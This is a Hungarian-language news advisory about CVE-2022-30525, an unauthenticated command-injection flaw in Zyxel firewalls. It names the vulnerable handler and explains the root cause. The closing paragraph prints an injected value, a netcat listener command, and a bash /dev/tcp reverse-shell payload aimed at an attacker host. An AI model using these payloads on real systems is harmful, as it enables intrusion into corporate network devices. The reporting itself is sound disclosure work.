Sebezhetőség a Zyxel tűzfalakban, amely hitelesítés nélküli kódfuttatást tesz lehetővé

Kritikus sérülékenységet (CVE-2022-30525) azonosítottak az ATP, VPN és USG FLEX sorozatú Zyxel eszközökön, amelyek a tűzfalak, IDS és VPN működésének megszervezésére szolgálnak a vállalatoknál, és lehetővé teszik a külső támadók számára, hogy kódot hajtsanak végre a felhasználói jogok nélküli eszköz hitelesítés nélkül. A támadás végrehajtásához a támadónak képesnek kell lennie arra, hogy kéréseket küldjön az eszköznek a HTTP/HTTPS protokoll használatával. A Zyxel kijavította a ZLD 5.30 firmware-frissítés sebezhetőségét. A Shodan szolgáltatás szerint jelenleg 16213 XNUMX potenciálisan sebezhető eszköz található a globális hálózaton, amelyek HTTP/HTTPS-en keresztül fogadnak kéréseket.

A művelet speciálisan kialakított parancsok küldésével történik a /ztp/cgi-bin/handler webkezelőnek, amely hitelesítés nélkül érhető el. A problémát a kérésparaméterek megfelelő tisztításának hiánya okozza, amikor parancsokat hajtanak végre a rendszeren a lib_wan_settings.py könyvtárban használt os.system hívással, és a setWanPortSt művelet feldolgozása során.

Például egy támadó átadhatja a „; ping 192.168.1.210;" amely a „ping 192.168.1.210” parancs végrehajtásához vezet a rendszeren. A parancshéjhoz való hozzáféréshez futtathatja az „nc -lvnp 1270” parancsot a rendszeren, majd fordított kapcsolatot kezdeményezhet úgy, hogy kérést küld az eszköznek a '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Forrás: opennet.ru

Hozzászólás